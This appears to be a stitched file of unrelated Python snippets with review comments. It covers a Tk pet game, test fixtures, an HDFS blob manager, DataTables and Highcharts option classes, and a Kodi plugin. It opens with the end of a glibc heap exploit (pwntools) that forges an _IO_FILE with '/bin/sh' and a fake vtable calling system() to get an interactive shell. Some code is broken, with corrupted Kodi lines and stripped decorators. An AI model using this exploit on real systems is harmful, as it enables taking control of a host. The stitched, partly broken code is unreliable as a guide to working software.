    log.info(('_IO_list_all address: 0x%x' % io_list_all))
    log.info(('system address: 0x%x' % system_addr))
    log.info(('vtable address: 0x%x' % vtable_addr))
    # Forged _IO_FILE: begins with "/bin/sh" so the struct's own address is
    # the argument handed to system() when the vtable call fires.
    stream = ('/bin/sh\x00' + p64(96))
    # io_list_all - 0x10 as bk: unsorted-bin-attack style target — confirm
    # against the exploited glibc version.
    stream += (p64(0) + p64((io_list_all - 16)))
    stream = stream.ljust(160, '\x00')
    stream += p64((heap_addr + 1464))
    stream = stream.ljust(192, '\x00')
    stream += p64(1)
    payload = ('A' * 1056)  # padding up to the chunk being corrupted
    payload += stream
    payload += (p64(0) * 2)
    payload += p64(vtable_addr)  # _IO_FILE vtable pointer -> fake table below
    payload += p64(1)
    payload += p64(2)
    payload += p64(system_addr)  # fake vtable entry invoked by stdio
    upgrade(1536, payload)
    io.sendlineafter('Your choice : ', '1')
    io.interactive()
def start():
    """Reset the pet-game state and kick off the update loop.

    All game state lives in module-level globals so the Tk callbacks can
    share it between timer ticks.
    """
    # Fix: 'sick' was assigned below but missing from the global statement,
    # so it only ever set a function-local and the module-level flag was
    # never reset when a new game started.
    global gameStarted, hunger, fun, health, alive, day, money, sick
    if not gameStarted:
        gameStarted = True
        hunger = 100
        fun = 100
        health = 100
        day = 0
        money = 0
        sick = False
        alive = True
        startLabel.config(text='')
        update()
def make_transfer_trace(block_number: int, transaction_hash: str, trace_address: List[int], from_address: str, to_address: str, token_address: str, amount: int):
    """Build a DecodedCallTrace for an ERC-20 ``transfer(recipient, amount)`` call.

    The trace-level ``to_address`` is the token contract (``token_address``);
    the ``to_address`` argument (the human recipient) goes into
    ``inputs['recipient']``. ``from_address`` is the caller of the contract.
    ``block_hash`` is synthesized from the block number (test fixture style).
    """
    # NOTE(review): subtraces is passed as the float 0.0 — an int 0 looks
    # intended; confirm against the DecodedCallTrace field type.
    return DecodedCallTrace(transaction_hash=transaction_hash, transaction_position=0, block_number=block_number, type=TraceType.call, trace_address=trace_address, classification=Classification.transfer, from_address=from_address, to_address=token_address, abi_name='ERC20', function_name='transfer', function_signature='transfer(address,uint256)', inputs={'recipient': to_address, 'amount': amount}, block_hash=str(block_number), action={}, subtraces=0.0)
def _AddVersionKeys(plist, version=None):
if version:
match = re.match('\\d+\\.\\d+\\.(\\d+\\.\\d+)$', version)
if (not match):
print(('Invalid version string specified: "%s"' % version), file=sys.stderr)
return False
full_version = match.group(0)
bundle_version = match.group(1)
else:
VERSION_TOOL = os.path.join(TOP, 'build/util/version.py')
VERSION_FILE = os.path.join(TOP, 'chrome/VERSION')
(stdout, retval1) = _GetOutput([VERSION_TOOL, '-f', VERSION_FILE, '-t', ''])
full_version = stdout.rstrip()
(stdout, retval2) = _GetOutput([VERSION_TOOL, '-f', VERSION_FILE, '-t', ''])
bundle_version = stdout.rstrip()
if (retval1 or retval2):
return False
plist['CFBundleShortVersionString'] = full_version
plist['CFBundleVersion'] = bundle_version
return True |
# NOTE(review): the bare string expression below is a no-op — presumably the
# argument of a stripped routing decorator such as @plugin.route(...).
('/dbphotos/<subject>/<pictype>/<page>')
def dbphotos(subject, pictype='S', page=0):
    """Build a Kodi menu of Douban-style photo entries for *subject*.

    pictype selects one of three picture categories ('R'/'S'/'W'); menu
    entries for the other two categories are prepended, followed by one
    entry per photo scraped from the fetched page, plus a next-page entry.
    """
    # Offer links to the two categories that are NOT currently selected.
    pictypes = {'R': '', 'S': '', 'W': ''}
    del pictypes[pictype]
    menus = []
    for key in pictypes:
        menus.append({'label': comm.colorize_label(pictypes[key], None, color='32FF94'), 'path': plugin.url_for('dbphotos', subject=subject, pictype=key, page=0), 'thumbnail': xbmc.translatePath(os.path.join(IMAGES_PATH, 'picture.png'))})
    # NOTE(review): the next two lines are corrupted — the URL template and the
    # HTTP fetch call have lost their string literals and are not valid Python.
    # Restore them from the original plugin source before use.
    url = (' % (subject, pictype, (int(page) * 30)))
    rsp = _ referer='
    # Regex over the fetched HTML: captures each photo's thumbnail URL and name.
    rtxt = '\\x3Cli.*?data\\x2Did.*?img\\s+src\\x3D\\x22(?P<imgurl>[^\\s]*?)\\x22.*?\\x22name\\x22\\x3E(?P<imgname>.*?)\\x3C'
    for photo in re.finditer(rtxt, rsp, re.DOTALL):
        resource_url = ''  # NOTE(review): assigned but never used — confirm intent
        limg = photo.group('imgurl')
        # Swap the medium-size path segment for the large one.
        limg = limg.replace('/m/', '/l/')
        imgname = html.unescape(photo.group('imgname').strip())
        menus.append({'label': imgname, 'path': plugin.url_for('showpic', imageurl=limg), 'properties': {'mimetype': 'image/jpeg'}, 'thumbnail': photo.group('imgurl')})
    # Pagination: 30 photos per page; add a next-page entry while more remain.
    m = re.search('"count".*?(?P<count>[0-9]+)', rsp, re.DOTALL)
    if m:
        count = int(m.group('count'))
        totalpage = int(((count - 1) / 30))
        if (int(page) < totalpage):
            menus.append({'label': '', 'thumbnail': xbmc.translatePath(os.path.join(IMAGES_PATH, 'nextpage.png')), 'path': plugin.url_for('dbphotos', subject=subject, pictype=pictype, page=(int(page) + 1))})
    comm.setViewCode = 'thumbnail'
    return menus
class TestOFReader(unittest.TestCase):
    """Unit tests for OFReader: sequential reads, skipping, peeking, slicing
    and 8-byte alignment over a fixed string buffer.

    NOTE(review): uses Python-2-era unittest aliases (assertEquals,
    assertRaisesRegexp — removed in Python 3.12) and str buffers for binary
    data; keep that in mind when porting.
    """
    def test_simple(self):
        # Consecutive reads advance the cursor; reading past the end raises.
        reader = OFReader('abcdefg')
        self.assertEquals(reader.read('2s')[0], 'ab')
        self.assertEquals(reader.read('2s')[0], 'cd')
        self.assertEquals(reader.read('3s')[0], 'efg')
        with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
            reader.read('s')
    def test_skip(self):
        # skip() advances without returning data; over-skip raises.
        reader = OFReader('abcdefg')
        reader.skip(4)
        self.assertEquals(reader.read('s')[0], 'e')
        with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
            reader.skip(3)
    def test_empty(self):
        reader = OFReader('abcdefg')
        self.assertEquals(reader.is_empty(), False)
        reader.skip(6)
        self.assertEquals(reader.is_empty(), False)
        reader.skip(1)
        self.assertEquals(reader.is_empty(), True)
        with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
            reader.skip(1)
    def test_exception_effect(self):
        # A failed skip must not move the cursor.
        reader = OFReader('abcdefg')
        with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
            reader.skip(8)
        self.assertEquals(reader.is_empty(), False)
        reader.skip(7)
        self.assertEquals(reader.is_empty(), True)
    def test_peek(self):
        # peek() returns data without consuming it.
        reader = OFReader('abcdefg')
        self.assertEquals(reader.peek('2s')[0], 'ab')
        self.assertEquals(reader.peek('2s')[0], 'ab')
        self.assertEquals(reader.read('2s')[0], 'ab')
        self.assertEquals(reader.peek('2s')[0], 'cd')
        reader.skip(2)
        self.assertEquals(reader.read('3s')[0], 'efg')
        with self.assertRaisesRegexp(loxi.ProtocolError, 'Buffer too short'):
            reader.peek('s')
    def test_read_all(self):
        # read_all() drains the remainder; a second call yields ''.
        reader = OFReader('abcdefg')
        reader.skip(2)
        self.assertEquals(reader.read_all(), 'cdefg')
        self.assertEquals(reader.read_all(), '')
    def test_slice(self):
        # slice(n) hands out a child reader over the next n bytes and
        # consumes them from the parent.
        reader = OFReader('abcdefg')
        reader.skip(2)
        self.assertEquals(reader.slice(3).read_all(), 'cde')
        self.assertEquals(reader.slice(2).read_all(), 'fg')
        self.assertEquals(reader.is_empty(), True)
    def test_skip_align(self):
        # skip_align() rounds the cursor up to the next 8-byte boundary;
        # child readers align relative to their own start.
        reader = OFReader((((('abcd' + 'efgh') + 'ijkl') + 'mnop') + 'qrst'))
        reader.skip_align()
        self.assertEquals(reader.peek('2s')[0], 'ab')
        self.assertEquals(reader.read('2s')[0], 'ab')
        reader.skip_align()
        self.assertEquals(reader.peek('2s')[0], 'ij')
        self.assertEquals(reader.read('2s')[0], 'ij')
        child = reader.slice(10)
        self.assertEquals(child.read('2s')[0], 'kl')
        child.skip_align()
        self.assertEquals(child.peek('2s')[0], 'st')
class LedgerDialogues(LedgerApiDialogues):
    """Ledger-API dialogue collection where this agent always plays LEDGER."""

    def __init__(self, self_address: Address) -> None:
        """Initialize the collection for *self_address*."""

        # The agent's role is fixed regardless of the first message received.
        def role_from_first_message(message: Message, receiver_address: Address) -> BaseDialogue.Role:
            return LedgerApiDialogue.Role.LEDGER

        LedgerApiDialogues.__init__(
            self,
            self_address=self_address,
            role_from_first_message=role_from_first_message,
            dialogue_class=LedgerDialogue,
        )
class SliderInterface():
    """Property-based adapter around a QSlider-like widget.

    Fix: the accessor pairs (``value``/``max``/``min``) were defined as
    plain methods sharing one name, so each setter definition silently
    replaced its getter — restoring the ``@property`` / ``@<name>.setter``
    decorators makes both directions usable, as the get/set method pairs
    clearly intend.
    """

    def __init__(self, qslider):
        # The wrapped widget; must expose value/setValue, maximum/setMaximum,
        # minimum/setMinimum.
        self.qslider = qslider

    @property
    def value(self) -> int:
        """Current slider position."""
        return self.qslider.value()

    @value.setter
    def value(self, value: int):
        self.qslider.setValue(value)

    @property
    def max(self) -> int:
        """Upper bound of the slider range."""
        return self.qslider.maximum()

    @max.setter
    def max(self, value: int):
        self.qslider.setMaximum(value)

    @property
    def min(self):
        """Lower bound of the slider range."""
        return self.qslider.minimum()

    @min.setter
    def min(self, value: int):
        self.qslider.setMinimum(value)
class TestXmlTreeWriter():
    """Behavioral tests for XmlTreeWriter's path-based element creation."""

    def test_should_create_separate_elements_depending_on_path(self):
        # Different leaf names under the same parent must yield two elements.
        writer = XmlTreeWriter(E('root'), element_maker=E)
        for leaf, text in (('child1', TEXT_1), ('child2', TEXT_2)):
            writer.require_path(['parent', leaf])
            writer.append_text(text)
        tree = writer.root
        assert get_text_content_list(tree.xpath('parent/child1')) == [TEXT_1]
        assert get_text_content_list(tree.xpath('parent/child2')) == [TEXT_2]

    def test_should_create_use_same_element_for_same_path(self):
        # Requiring the same path twice must append into one element.
        writer = XmlTreeWriter(E('root'), element_maker=E)
        for text in (TEXT_1, TEXT_2):
            writer.require_path(['parent', 'child1'])
            writer.append_text(text)
        tree = writer.root
        assert get_text_content_list(tree.xpath('parent/child1')) == [TEXT_1 + TEXT_2]
def get_help_topic(help_entry):
    """Return the lower-cased topic name for *help_entry*.

    Prefers the entry's truthy ``key`` attribute, falling back to ``db_key``
    and finally the literal 'unknown_topic'. As a side effect, ensures the
    entry carries a ``web_help_key`` (slugified topic) attribute.
    """
    topic = getattr(help_entry, 'key', None) or getattr(help_entry, 'db_key', 'unknown_topic')
    if not hasattr(help_entry, 'web_help_key'):
        help_entry.web_help_key = slugify(topic)
    return topic.lower()
class HDFSBlobManager(BlobManager):
    """BlobManager that stores artifact files in HDFS under ``root_dir``.

    Config keys:
        root_directory: base HDFS directory (validated via ``self.root_dir``).
        hdfs_url: WebHDFS endpoint, required.
        hdfs_user: HDFS user name, defaults to 'default'.
    """

    def __init__(self, config: Dict[(str, Any)]):
        super().__init__(config)
        if not self.root_dir:
            raise AIFlowConfigException('`root_directory` option of blob manager config is not configured.')
        hdfs_url = config.get('hdfs_url', None)
        if not hdfs_url:
            raise AIFlowConfigException('`hdfs_url` is not configured.')
        hdfs_user = config.get('hdfs_user', 'default')
        self._hdfs_client = InsecureClient(url=hdfs_url, user=hdfs_user)

    def upload(self, local_file_path: str) -> str:
        """Upload a local file into ``root_dir`` and return its HDFS path."""
        file_name = os.path.basename(local_file_path)
        remote_file_path = os.path.join(self.root_dir, file_name)
        self._hdfs_client.upload(hdfs_path=remote_file_path, local_path=local_file_path)
        return remote_file_path

    def download(self, remote_file_path: str, local_dir: str) -> str:
        """Download ``remote_file_path`` into ``local_dir`` and return the local path.

        An exclusive flock on a sidecar ``.lock`` file serializes concurrent
        downloads of the same file across processes; only the first process
        actually transfers data.

        Raises:
            RuntimeError: if the download ultimately fails. (Fix: the
            previous code logged and swallowed the error, then returned a
            path to a file that was never created.)
        """
        self._check_remote_path_legality(remote_file_path)
        file_name = os.path.basename(remote_file_path)
        local_file_path = os.path.join(local_dir, file_name)
        if not os.path.exists(local_file_path):
            lock_file_path = '{}.lock'.format(local_file_path)
            lock_file = open(lock_file_path, 'w')
            fcntl.flock(lock_file.fileno(), fcntl.LOCK_EX)
            try:
                # Re-check after acquiring the lock: another process may have
                # completed the download while we were waiting.
                if not os.path.exists(local_file_path):
                    self.log.info('Downloading file from HDFS: {}'.format(remote_file_path))
                    self._download_file_from_hdfs(hdfs_path=remote_file_path, local_path=local_file_path)
            except Exception as e:
                self.log.error('Failed to download file: {}'.format(remote_file_path), exc_info=e)
                raise
            finally:
                fcntl.flock(lock_file.fileno(), fcntl.LOCK_UN)
                self.log.debug('Unlocked file {}'.format(lock_file_path))
                lock_file.close()
                # Best-effort cleanup of the sidecar lock file.
                if os.path.exists(lock_file_path):
                    try:
                        os.remove(lock_file_path)
                    except OSError as e:
                        self.log.warning('Failed to remove lock file: {}'.format(lock_file_path), exc_info=e)
        else:
            self.log.debug('HDFS file: {} already exist at {}'.format(remote_file_path, local_file_path))
        return local_file_path

    def _download_file_from_hdfs(self, hdfs_path, local_path, retry_sleep_sec=5):
        """Download with up to 3 attempts, sleeping between retries."""
        for i in range(3):
            try:
                self._hdfs_client.download(hdfs_path=hdfs_path, local_path=local_path)
                return
            except Exception as e:
                self.log.error('Downloading file {} failed, retrying {}/3 in {} second'.format(hdfs_path, (i + 1), retry_sleep_sec), exc_info=e)
                time.sleep(retry_sleep_sec)
        raise RuntimeError('Failed to download HDFS file: {}'.format(hdfs_path))

    def _check_remote_path_legality(self, file_path: str):
        """Reject remote paths that fall outside this manager's root_dir."""
        if not file_path.startswith(self.root_dir):
            raise Exception('Cannot download {} from blob server'.format(file_path))
class Serve(BaseServe):
    """Serve component wiring SQLAlchemy-backed conversation/message storage.

    NOTE(review): ``conv_storage`` and ``message_storage`` read like
    ``@property`` accessors whose decorators may have been stripped; as
    written they are plain methods that callers must invoke. Confirm
    against the original source.
    """
    name = SERVE_APP_NAME
    def __init__(self, system_app: SystemApp, api_prefix: Optional[str]=f'/api/v1/serve/{APP_NAME}', api_tags: Optional[List[str]]=None, db_url_or_db: Union[(str, URL, DatabaseManager)]=None, try_create_tables: Optional[bool]=False):
        """Create the serve component; storages are built lazily in before_start()."""
        if (api_tags is None):
            api_tags = [SERVE_APP_NAME_HUMP]
        super().__init__(system_app, api_prefix, api_tags, db_url_or_db, try_create_tables)
        self._db_manager: Optional[DatabaseManager] = None
        self._conv_storage = None
        self._message_storage = None
    def conv_storage(self) -> StorageInterface:
        # Conversation storage; None until before_start() has run.
        return self._conv_storage
    def message_storage(self) -> StorageInterface:
        # Message storage; None until before_start() has run.
        return self._message_storage
    def init_app(self, system_app: SystemApp):
        """Attach to *system_app* exactly once (subsequent calls are no-ops)."""
        if self._app_has_initiated:
            return
        self._system_app = system_app
        self._app_has_initiated = True
    def on_init(self):
        # Import appears to be for its side effect (registering the ORM
        # entities) — confirm; the names themselves are unused here.
        from dbgpt.storage.chat_history.chat_history_db import ChatHistoryEntity, ChatHistoryMessageEntity
    def before_start(self):
        """Build the DB manager and the two SQLAlchemy-backed storages."""
        from dbgpt.storage.chat_history.chat_history_db import ChatHistoryEntity, ChatHistoryMessageEntity
        from dbgpt.storage.chat_history.storage_adapter import DBMessageStorageItemAdapter, DBStorageConversationItemAdapter
        from dbgpt.storage.metadata.db_storage import SQLAlchemyStorage
        from dbgpt.util.serialization.json_serialization import JsonSerializer
        self._db_manager = self.create_or_get_db_manager()
        self._conv_storage = SQLAlchemyStorage(self._db_manager, ChatHistoryEntity, DBStorageConversationItemAdapter(), JsonSerializer())
        self._message_storage = SQLAlchemyStorage(self._db_manager, ChatHistoryMessageEntity, DBMessageStorageItemAdapter(), JsonSerializer())
class EnhancedIconView(Gtk.IconView):
    """Gtk.IconView with debounced column re-layout on resize, an
    'item-clicked' signal, and context-menu handling."""
    __gtype_name__ = 'EnhancedIconView'
    # Custom signal fired on non-context-menu clicks: (Gdk event, tree path).
    __gsignals__ = {'item-clicked': (GObject.SIGNAL_RUN_LAST, None, (object, object))}
    # Model column holding the backing object; -1 means "return raw paths".
    object_column = GObject.property(type=int, default=(- 1))
    def __init__(self, *args, **kwargs):
        super(EnhancedIconView, self).__init__(*args, **kwargs)
        self._reallocate_count = 0
        self.view_name = None
        self.source = None
        self.ext_menu_pos = 0
        # NOTE(review): self.popup is read in do_button_press_event but never
        # initialized here — callers presumably set it; confirm.
    def do_size_allocate(self, allocation):
        # Debounce: each width change schedules a deferred re-layout; only
        # the last pending one (counter back to 0) actually recomputes.
        if (self.get_allocated_width() != allocation.width):
            self._reallocate_count += 1
            Gdk.threads_add_timeout(GLib.PRIORITY_DEFAULT_IDLE, 500, self._reallocate_columns, None)
        Gtk.IconView.do_size_allocate(self, allocation)
    def do_button_press_event(self, event):
        """Handle context-menu clicks (select under cursor, show popup) and
        forward plain clicks as the 'item-clicked' signal."""
        x = int(event.x)
        y = int(event.y)
        current_path = self.get_path_at_pos(x, y)
        if ((event.type is Gdk.EventType.BUTTON_PRESS) and current_path):
            if event.triggers_context_menu():
                # Right-clicking outside the current selection moves the
                # selection to the item under the cursor first.
                if ((len(self.get_selected_objects()) > 0) and (not self.path_is_selected(current_path))):
                    self.unselect_all()
                    self.select_path(current_path)
                    self.set_cursor(current_path, None, False)
                if self.popup:
                    self.popup.popup(self.source, 'popup_menu', event.button, event.time)
            else:
                self.emit('item-clicked', event, current_path)
        Gtk.IconView.do_button_press_event(self, event)
    def _reallocate_columns(self, *args):
        self._reallocate_count -= 1
        if (not self._reallocate_count):
            # Force Gtk to recompute the column count for the new width.
            self.set_columns(0)
            self.set_columns((- 1))
    def get_selected_objects(self):
        """Return the selected model objects (or raw paths when no object
        column is configured), in visual order."""
        selected_items = self.get_selected_items()
        # NOTE(review): truthiness check means object_column == 0 is treated
        # as "not configured" (default is -1) — confirm column 0 is never used.
        if (not self.object_column):
            return selected_items
        model = self.get_model()
        # get_selected_items() yields paths in reverse order; undo that.
        selected_objects = list(reversed([model[selected][self.object_column] for selected in selected_items]))
        return selected_objects
    def select_and_scroll_to_path(self, path):
        """Make *path* the only selection and center it in the view."""
        self.unselect_all()
        self.select_path(path)
        self.set_cursor(path, None, False)
        self.scroll_to_path(path, True, 0.5, 0.5)
class TableConfig(OptionsWithTemplates):
    """DataTables table-configuration options builder.

    Each simple option appears as a getter (``return self._config_get()``)
    followed by a setter (``self._config(val)``); extension options return a
    typed sub-configuration object via ``_config_sub_data``.

    NOTE(review): this block looks decorator-stripped. The getter/setter
    pairs sharing one name only work as properties if ``@property`` /
    ``@<name>.setter`` decorators are present — as written, the later
    ``def`` silently replaces the earlier one. The stray tuple expressions
    such as ``('datatables-autoFill', 'datatables-autoFill')`` are no-op
    statements, presumably residue of package-import decorator arguments.
    ``select`` is defined twice (plain option, then datatables-select
    extension); only the last definition survives. Confirm against the
    original epyk source before relying on this block.
    """
    ('datatables-autoFill', 'datatables-autoFill')
    def autoFill(self):
        from epyk.core.html.tables.exts import DtAutoFill
        return self._config_sub_data('autoFill', DtAutoFill.AutoFill)
    def autoWidth(self):
        return self._config_get()
    def autoWidth(self, val):
        self._config(val)
    ('datatables-buttons', 'datatables-buttons')
    def buttons(self):
        from epyk.core.html.tables.exts import DtButtons
        self.dom = 'B<"clear">lfrtip'
        return self._config_sub_data('buttons', DtButtons.Buttons)
    ('datatables-buttons', 'datatables-buttons')
    def colReorder(self):
        from epyk.core.html.tables.exts import DtColReorder
        return self._config_sub_data('colReorder', DtColReorder.ColReorder)
    def deferRender(self):
        return self._config_get()
    def deferRender(self, val):
        self._config(val)
    ('datatables-fixed-header', 'datatables-fixed-header')
    def fixedHeader(self):
        from epyk.core.html.tables.exts import DtFixedHeader
        # NOTE(review): 'FixedHeater' matches the ext module as referenced
        # here but looks like a typo for 'FixedHeader' — confirm.
        return self._config_sub_data('fixedHeader', DtFixedHeader.FixedHeater)
    ('datatables-fixed-columns', 'datatables-fixed-columns')
    def fixedColumns(self):
        from epyk.core.html.tables.exts import DtFixedColumns
        return self._config_sub_data('fixedColumns', DtFixedColumns.FixedColumns)
    ('datatables-keytable', 'datatables-keytable')
    def keys(self):
        from epyk.core.html.tables.exts import DtKeyTable
        return self._config_sub_data('keys', DtKeyTable.KeyTable)
    def lengthChange(self):
        return self._config_get()
    def lengthChange(self, val):
        self._config(val)
    def columnDefs(self):
        return self._config_sub_data_enum('columnDefs', ColumnDef)
    def columns(self):
        return self._config_sub_data_enum('columns', Column)
    def language(self):
        return self._config_sub_data('language', Language)
    def ajax(self):
        return self._config_get()
    def ajax(self, val):
        self._config(val)
    def processing(self):
        return self._config_get()
    def processing(self, val):
        self._config(val)
    def search(self):
        return self._config_sub_data_enum('search', Search)
    def serverSide(self):
        return self._config_get()
    def serverSide(self, val):
        self._config(val)
    def deferLoading(self):
        return self._config_get()
    def deferLoading(self, val):
        self._config(val)
    def destroy(self):
        return self._config_get()
    def destroy(self, val):
        self._config(val)
    def displayStart(self):
        return self._config_get()
    def displayStart(self, val):
        self._config(val)
    def dom(self):
        return self._config_get()
    def dom(self, val):
        self._config(val)
    def data(self):
        return self._config_get()
    def data(self, val):
        self._config(val)
    def paging(self):
        return self._config_get()
    def paging(self, val):
        self._config(val)
    def info(self):
        return self._config_get()
    def info(self, val):
        self._config(val)
    def orderCellsTop(self):
        return self._config_get()
    def orderCellsTop(self, val):
        self._config(val)
    def orderClasses(self):
        return self._config_get()
    def orderClasses(self, val):
        self._config(val)
    def orderFixed(self):
        return self._config_get()
    def orderFixed(self, val):
        self._config(val)
    def orderMulti(self):
        return self._config_get()
    def orderMulti(self, val):
        self._config(val)
    def ordering(self):
        return self._config_get()
    def ordering(self, val):
        self._config(val)
    def order(self, column, direction):
        # Accumulates [column, direction] pairs under the 'order' key.
        if ('order' not in self.js_tree):
            self._config([])
        self.js_tree['order'].append([column, direction])
        return self
    def aoColumns(self):
        return self._config_sub_data_enum('aoColumns', AOColumns)
    ('datatables-responsive', 'datatables-responsive')
    def responsive(self):
        from epyk.core.html.tables.exts import DtResponsive
        return self._config_sub_data('responsive', DtResponsive.Responsive)
    def stateSave(self):
        return self._config_get()
    def stateSave(self, val):
        self._config(val)
    def scrollY(self):
        return self._config_get()
    def scrollY(self, val):
        self._config(val)
    def scrollX(self):
        return self._config_get()
    def scrollX(self, val):
        self._config(val)
    def scrollCollapse(self):
        return self._config_get()
    def scrollCollapse(self, val):
        self._config(val)
    def displayLength(self):
        return self._config_get()
    def displayLength(self, val):
        self._config(val)
    def lengthMenu(self):
        return self._config_get()
    def lengthMenu(self, val):
        self._config(val)
    def select(self):
        return self._config_get()
    def select(self, val):
        self._config(val)
    def pageLength(self):
        return self._config_get()
    def pageLength(self, val):
        self._config(val)
    def pagingType(self):
        return self._config_get()
    def pagingType(self, val):
        self._config(val)
    def renderer(self):
        return self._config_get()
    def renderer(self, val):
        self._config(val)
    def retrieve(self):
        return self._config_get()
    def retrieve(self, val):
        self._config(val)
    def rowId(self):
        return self._config_get()
    def rowId(self, val):
        self._config(val)
    ('datatables-row-group', 'datatables-row-group')
    def rowGroup(self):
        # NOTE(review): imports/uses DtFixedColumns for rowGroup — looks like
        # a copy/paste slip (a RowGroup ext would be expected); confirm.
        from epyk.core.html.tables.exts import DtFixedColumns
        return self._config_sub_data('rowGroup', DtFixedColumns.FixedColumns)
    def rowsGroup(self):
        return self._config_get()
    def rowsGroup(self, val):
        self.component.jsImports.add('datatables-rows-group')
        self._config(val)
    ('datatables-select', 'datatables-select')
    def select(self):
        from epyk.core.html.tables.exts import DtSelect
        return self._config_sub_data('select', DtSelect.Select)
    ('datatables-scroller', 'datatables-scroller')
    def scroller(self):
        from epyk.core.html.tables.exts import DtScroller
        return self._config_sub_data('scroller', DtScroller.Scroller)
    ('datatables-searchPanes', 'datatables-searchPanes')
    def searchPanes(self):
        from epyk.core.html.tables.exts import DtSearchPanes
        self.dom = 'Prftip'
        return self._config_sub_data('searchPanes', DtSearchPanes.SearchPanes)
    def searchCols(self):
        return self._config_get()
    def searchCols(self, val):
        self._config(val)
    def searchDelay(self):
        return self._config_get()
    def searchDelay(self, val):
        self._config(val)
    def stateDuration(self):
        return self._config_get()
    def stateDuration(self, val):
        self._config(val)
    def stripeClasses(self):
        return self._config_get()
    def stripeClasses(self, val):
        self._config(val)
    def tabIndex(self):
        return self._config_get()
    def tabIndex(self, val):
        self._config(val)
def _write_lookup_aciic_b(gen, t, srcs):
    """Emit code that stores the complex value ``srcs[3]`` into a 2D float
    array as an interleaved real/imaginary pair.

    Column indices are ``2*srcs[2]`` (real part) and ``2*srcs[2] + 1``
    (imaginary part); the remaining write_float_array_2D arguments are
    presumably (array, row, column, value) — confirm against that helper.
    Returns the emitted real-part write.
    """
    # i1 = 2*k (real column), i2 = i1 + 1 (imaginary column).
    i1 = gen.emit_binop('*', [ConstIntArg(2), srcs[2]], Int)
    i2 = gen.emit_binop('+', [ConstIntArg(1), i1], Int)
    d1 = gen.emit_func_n(4, 'write_float_array_2D', [srcs[0], srcs[1], i1, srcs[3].re], Float)
    d2 = gen.emit_func_n(4, 'write_float_array_2D', [srcs[0], srcs[1], i2, srcs[3].im], Float)
    # NOTE(review): d2 is emitted for its side effect only; just the
    # real-part write is returned — confirm callers never need both.
    return d1
class EmailMessagesPrefs(QuickbooksBaseObject):
    """Container for the four QuickBooks email-message templates."""

    class_dict = {'InvoiceMessage': EmailMessageType, 'EstimateMessage': EmailMessageType, 'SalesReceiptMessage': EmailMessageType, 'StatementMessage': EmailMessageType}

    def __init__(self):
        super().__init__()
        # All message slots start unset until populated from the API payload.
        for field in ('InvoiceMessage', 'EstimateMessage', 'SalesReceiptMessage', 'StatementMessage'):
            setattr(self, field, None)
def register_dataset_split(dataset_name, split_dict):
    """Register *dataset_name* via the loader matching ``split_dict['DS_TYPE']``.

    Falls back to the COCODataset loader when no DS_TYPE is given; raises
    KeyError for an unknown dataset type.
    """
    loaders = {
        'COCODataset': _register_extended_coco,
        'COCOText': _register_coco_text,
        'COCOTextDataset': _register_coco_text,
        'LVISDataset': _register_extended_lvis,
    }
    ds_type = split_dict.get('DS_TYPE', 'COCODataset')
    loaders[ds_type](dataset_name=dataset_name, split_dict=split_dict)
def str2type(str_type):
    """Parse a Transonic type-annotation string into a typing/numpy object.

    Tries, in order: ``"A or B"`` unions (recursive), names resolvable via
    eval in this module, bare numpy scalar names, parenthesized tuple
    specs, ``"... list"``, ``"key: value dict"``, ``"... set"`` and finally
    ``dtype[shape]`` array specs returning ``Array`` (Array presumably
    comes from the enclosing module's imports).

    Raises NotImplementedError for malformed dict/set forms and ValueError
    when no rule matches.
    """
    str_type = str_type.strip()
    if (' or ' in str_type):
        # Union of alternatives, each parsed recursively.
        subtypes = str_type.split(' or ')
        return Union[tuple((str2type(subtype) for subtype in subtypes))]
    try:
        # Plain names resolvable in this module's namespace (int, float, ...).
        return eval(str_type)
    except (TypeError, SyntaxError, NameError):
        pass
    if ('[' not in str_type):
        try:
            # Bare numpy scalar type, e.g. "float32" -> np.float32.
            if (not str_type.startswith('np.')):
                dtype = ('np.' + str_type)
            else:
                dtype = str_type
            return eval(dtype, {'np': np})
        except (TypeError, SyntaxError, AttributeError):
            pass
    if (str_type.startswith('(') and str_type.endswith(')')):
        # Tuple type: split on commas that are not nested inside [] or ().
        re_comma = re.compile(',(?![^\\[]*\\])(?![^\\(]*\\))')
        return Tuple[tuple((str2type(word) for word in re_comma.split(str_type[1:(- 1)]) if word))]
    words = [word for word in str_type.split(' ') if word]
    if (words[(- 1)] == 'list'):
        # "X list" -> List["X"]; the element type stays a forward-ref string.
        return List[' '.join(words[:(- 1)])]
    if (words[(- 1)] == 'dict'):
        # "key: value dict" — exactly three words expected.
        if (len(words) != 3):
            raise NotImplementedError(f'words: {words}')
        key = words[0][:(- 1)]  # drop the trailing ':'
        value = words[1]
        return Dict[(key, value)]
    if (words[(- 1)] == 'set'):
        if (len(words) != 2):
            raise NotImplementedError(f'words: {words}')
        key = words[0]
        return Set[key]
    if ('[' not in str_type):
        raise ValueError(f"Can't determine the Transonic type from '{str_type}'")
    # Array spec "dtype[shape]": split once at the first '[' and rebuild the
    # shape part with its leading bracket.
    (dtype, str_shape) = str_type.split('[', 1)
    dtype = dtype.strip()
    if ((not dtype.startswith('np.')) and (dtype not in ('int', 'float'))):
        dtype = ('np.' + dtype)
    str_shape = ('[' + str_shape)
    dtype = eval(dtype, {'np': np})
    return Array[(dtype, str_shape)]
class OptionSeriesScatter3dStatesHoverHalo(Options):
    """Hover-halo state options for scatter-3d series.

    NOTE(review): each option appears as a getter/setter pair sharing one
    name without visible @property / @<name>.setter decorators — as written
    only the setter survives; the decorators were presumably stripped.
    Defaults shown are the ones passed to _config_get.
    """
    def attributes(self):
        return self._config_get(None)
    def attributes(self, value: Any):
        self._config(value, js_type=False)
    def opacity(self):
        # Halo opacity; defaults to 0.25.
        return self._config_get(0.25)
    def opacity(self, num: float):
        self._config(num, js_type=False)
    def size(self):
        # Halo size in pixels; defaults to 10.
        return self._config_get(10)
    def size(self, num: float):
        self._config(num, js_type=False)
class OptionSeriesHeatmapDataEvents(Options):
    """Per-point event-handler options for heatmap series data.

    Every handler (click, drag, dragStart, drop, mouseOut, mouseOver,
    remove, select, unselect, update) defaults to None.

    NOTE(review): each handler appears as a getter/setter pair sharing one
    name without visible @property / @<name>.setter decorators — as written
    only the setter survives; the decorators were presumably stripped.
    """
    def click(self):
        return self._config_get(None)
    def click(self, value: Any):
        self._config(value, js_type=False)
    def drag(self):
        return self._config_get(None)
